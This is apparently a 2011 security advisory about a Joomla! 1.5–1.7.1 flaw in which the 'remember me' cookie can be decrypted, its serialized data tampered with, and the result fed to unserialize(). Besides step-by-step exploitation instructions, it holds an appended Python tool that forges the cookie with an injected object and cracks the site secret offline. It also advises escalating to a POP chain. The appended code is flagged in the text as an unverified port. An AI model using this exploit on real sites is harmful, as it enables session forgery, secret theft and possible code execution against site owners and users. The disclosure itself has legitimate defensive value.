Wednesday, 28 September 2011 23:11

There is a serious problem with the way Joomla! handles the "remember me" login cookie. The cookie's contents can be decrypted, the serialized data inside altered and re-encrypted, and the tampered value is then handed to unserialize() by the site, which can lead to exploitation. Joomla! versions 1.5 through 1.7.1 are affected.

Sites running a PHP build that is still vulnerable to the "SplObjectStorage Deserialization Use-After-Free Vulnerability" should be exploitable directly; other scenarios are possible depending on the installed extensions and which classes are loaded at the time of deserialization.

The prerequisites for testing this issue:

  • a browser (or extension) that allows you to change your UA
  • a browser (or extension) that allows you to edit/delete cookies
  • a valid front-end user account on the test site
  • the "remember me" plugin must be enabled
  • the ability to run PHP locally (to do the decryption)

Here's how it works: visit the target site with a User-Agent of JLOGIN_REMEMBER and log in with a valid account, ticking the "remember me" checkbox. Doing so results in two cookies: a session cookie and a "remember me" cookie.

If you have done this correctly, the second cookie will have an md5 hash for its name and a JSimpleCrypt-encrypted serialized array for its value. The encryption key is derived from the User-Agent string in exactly the same way the cookie name is derived from the fixed string JLOGIN_REMEMBER, so with a User-Agent of JLOGIN_REMEMBER the cookie name is the decryption key. Using modified code from JSimpleCrypt, you can use this key to decrypt the cookie value, alter the serialized string, re-encrypt it, and write the result back as the cookie's value.

Once the "remember me" cookie holds the malicious encrypted data, delete the session cookie and revisit the target site (with the same User-Agent) so that Joomla! parses the "remember me" cookie and unserializes the injected string. On installations that are patched against the SplObjectStorage vulnerability mentioned above, there is still at the very least an information disclosure issue.

The cookie name is JUtility::getHash('JLOGIN_REMEMBER') and the key is JUtility::getHash($_SERVER['HTTP_USER_AGENT']), where getHash($seed) is md5 of the site secret concatenated with $seed (check the installed libraries/joomla/utilities/utility.php for the exact concatenation order before cracking). That is why a User-Agent of JLOGIN_REMEMBER makes the cookie name equal the key, and why a completely blank User-Agent reduces the key to an md5 of the site secret alone. Either way, the cookie name hands every visitor an md5 of the site secret with a known suffix, and utilities such as JtR or Hashcat can be run against it offline to try to recover the site secret.
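The cookie forging procedure described above and the offline check on the cookie name, as an added example that is not code from the original post or from Joomla!. It is a Python port of the JSimpleCrypt scheme and of the JUtility::getHash key derivation as I read them in the 1.5 to 1.7.1 sources; verify it against the target's libraries/joomla/utilities/simplecrypt.php before relying on it. The site secret, credentials, class name NotThere and candidate list are constructed sample data, and the JSimpleCrypt port is assumed to match the site's copy.

```python
"""Forge a Joomla! 1.5-1.7.1 "remember me" cookie and check the cookie name
against candidate site secrets.  Added example, not Joomla! code; the
JSimpleCrypt port is assumed to match the site's simplecrypt.php."""
import base64
import hashlib
import random


def joomla_get_hash(secret, seed):
    """JUtility::getHash($seed): md5 of the site secret followed by the seed."""
    return hashlib.md5((secret + seed).encode()).hexdigest()


def _xor_with_key(data, key):
    """JSimpleCrypt::_encrypt: XOR every byte against the repeating 32-char md5 of key."""
    ks = hashlib.md5(key.encode()).hexdigest().encode()
    return bytes(b ^ ks[i % len(ks)] for i, b in enumerate(data))


def simplecrypt_encrypt(plaintext, key, inner_key=None):
    """JSimpleCrypt::encrypt: interleave a throwaway per-message md5 with the
    XORed plaintext, XOR the whole buffer with md5(key), then base64 it."""
    if inner_key is None:  # PHP: md5(rand(0, 32000))
        inner_key = hashlib.md5(str(random.randint(0, 32000)).encode()).hexdigest()
    ik = inner_key.encode()
    tmp = bytearray()
    for i, b in enumerate(plaintext):
        k = ik[i % len(ik)]
        tmp += bytes((k, b ^ k))
    return base64.b64encode(_xor_with_key(bytes(tmp), key)).decode()


def simplecrypt_decrypt(cookie_value, key):
    """JSimpleCrypt::decrypt: undo the outer XOR, then strip the interleaved key bytes."""
    raw = _xor_with_key(base64.b64decode(cookie_value), key)
    return bytes(raw[i + 1] ^ raw[i] for i in range(0, len(raw) - 1, 2))


def php_serialize_strings(d):
    """serialize() of a PHP array of string keys and string values (ASCII assumed)."""
    body = "".join(f's:{len(k)}:"{k}";s:{len(v)}:"{v}";' for k, v in d.items())
    return f"a:{len(d)}:{{{body}}}"


def replace_serialized_value(serialized, key, injected):
    """Replace the string value following s:N:"key"; with an arbitrary serialized token."""
    marker = f's:{len(key)}:"{key}";'
    start = serialized.index(marker) + len(marker)
    if not serialized.startswith("s:", start):
        raise ValueError("expected a serialized string value")
    n_end = serialized.index(":", start + 2)
    n = int(serialized[start + 2:n_end])
    end = n_end + n + 4  # skip :"<n bytes>";
    return serialized[:start] + injected + serialized[end:]


def forge_remember_cookie(cookie_name, cookie_value, injected_username, inner_key=None):
    """With User-Agent JLOGIN_REMEMBER the key is getHash('JLOGIN_REMEMBER'), i.e. the
    cookie name.  Decrypt, splice the injected token into 'username', re-encrypt."""
    plain = simplecrypt_decrypt(cookie_value, cookie_name).decode()
    tampered = replace_serialized_value(plain, "username", injected_username)
    return simplecrypt_encrypt(tampered.encode(), cookie_name, inner_key)


def crack_site_secret(cookie_name, candidates):
    """The cookie name is getHash('JLOGIN_REMEMBER'), so candidate secrets can be
    checked offline; Hashcat/JtR do the same at scale with JLOGIN_REMEMBER as the salt."""
    for c in candidates:
        if joomla_get_hash(c, "JLOGIN_REMEMBER") == cookie_name:
            return c
    return None


def demo():
    """Simulate the site's side and return what it will unserialize on the next visit."""
    secret = "FCWsRe3Qgx8ucR1s"  # constructed sample site secret
    cookie_name = joomla_get_hash(secret, "JLOGIN_REMEMBER")  # site: setcookie() name
    key = joomla_get_hash(secret, "JLOGIN_REMEMBER")  # site: getHash(our User-Agent)
    creds = php_serialize_strings({"username": "alice", "password": "s3cret"})
    cookie_value = simplecrypt_encrypt(creds.encode(), key)
    # attacker side: only the cookie name and value are known
    forged = forge_remember_cookie(cookie_name, cookie_value, 'O:8:"NotThere":0:{}')
    return simplecrypt_decrypt(forged, key).decode()


if __name__ == "__main__":
    print(demo())
```

Send the forged value back under the same cookie name, drop the session cookie, and repeat the request with User-Agent: JLOGIN_REMEMBER; the undeclared class NotThere is what produces the __PHP_Incomplete_Class behaviour the post describes. Swap the injected token for an object of a class that is actually loaded to move from disclosure to a POP chain.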

Additional information can be gained if display_errors is enabled. The "username" value from the cookie is passed raw to mysql_real_escape_string (via the database quoting in the authentication plugin), which throws an error when given a non-string value, and passing a serialized instance of an undeclared class produces a __PHP_Incomplete_Class error. The "password" value is particularly interesting because it is converted to a string once the "username" value is accepted, so errors can be provoked by handing it an object with no __toString method, or it can be abused as part of a POP chain if any interesting classes with usable __toString methods are available through third-party extensions.

This issue was patched 17 October 2011.

Last Updated on Monday, 17 October 2011 13:00
The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.
